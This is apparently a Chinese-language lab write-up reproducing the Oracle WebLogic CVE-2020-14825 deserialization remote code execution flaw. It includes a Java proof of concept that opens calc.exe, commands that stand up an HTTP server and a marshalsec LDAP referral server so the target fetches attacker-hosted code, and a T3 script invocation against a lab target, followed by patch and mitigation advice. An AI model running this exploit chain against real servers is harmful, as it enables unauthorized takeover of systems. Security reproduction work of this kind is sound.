Oracle WebLogic Server远程代码执行漏洞（CVE-2020-14825）

Oracle WebLogic Server是美国甲骨文（Oracle）公司的一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。
Oracle Fusion Middleware的Oracle WebLogic Server 12.2.1.3.0、12.2.1.4.0和14.1.1.0.0版本存在远程代码执行漏洞。未经身份认证的攻击者可通过访问IIOP T3利用该漏洞破坏Oracle WebLogic Server并对其进行接管。

漏洞影响范围

Oracle WebLogic Server 14.1.1.0.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 12.2.1.3.0

还是使用之前搭建的weblogic 12.1.4.0。

靶机：win10 weblogic 12.2.1.4.0

payload文件：exp.java

public class exp{
    // POC open calc
    public exp(){
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        exp e = new exp();
    }
}

javac编译生成exp.class文件。

在攻击机（192.168.2.132）使用python3开启HTTP服务，网站根目录为当前目录

sudo python3 -m http.server 80

然后攻击机（192.168.2.132）开启ldap服务。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.2.132/#exp 1389

这是使用的是编译好的marshalsec-0.0.3-SNAPSHOT-all.jar文件。

运行payload文件生成反序列化文件。通过T3协议传输发起命令执行。

payload 文件见：

https://github.com/rufherg/WebLogic_Basic_Poc/blob/master/poc/CVE_2020_14825.java

在生成ser反序列化文件时，遇到一些困难。CVE_2020_14825.java文件无法直接编译生成CVE_2020_14825.class文件。缺少一些java库和weblogic包。ysoserial-0.0.6-SNAPSHOT-all.jar

找到包之后导入新建项目。

依赖包导入后，运行java文件，生成ser反序列化文件

python T3 脚本见：

https://github.com/rufherg/WebLogic_Basic_Poc

通过t3协议传输。

python weblogic_poc.py -u 192.168.2.154 -p 7001 -f cve_2020_14825.ser

漏洞利用成功

Oracle已经为此发布了一个安全公告（cpuoct2020）以及相应补丁:
cpuoct2020：Oracle Critical Patch Update Advisory - October 2020
链接：https://www.oracle.com/security-alerts/cpuoct2020.html

限制T3访问来源漏洞产生于WebLogic默认启用的T3协议，因此可通过限制T3访问来源来阻止攻击。

禁用IIOP协议，可以查看下面官方文章进行关闭IIOP协议。

https://docs.oracle.com/middleware/1213/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html

https://mp.weixin.qq.com/s/kj3-p0cMark3lcvj9vx82g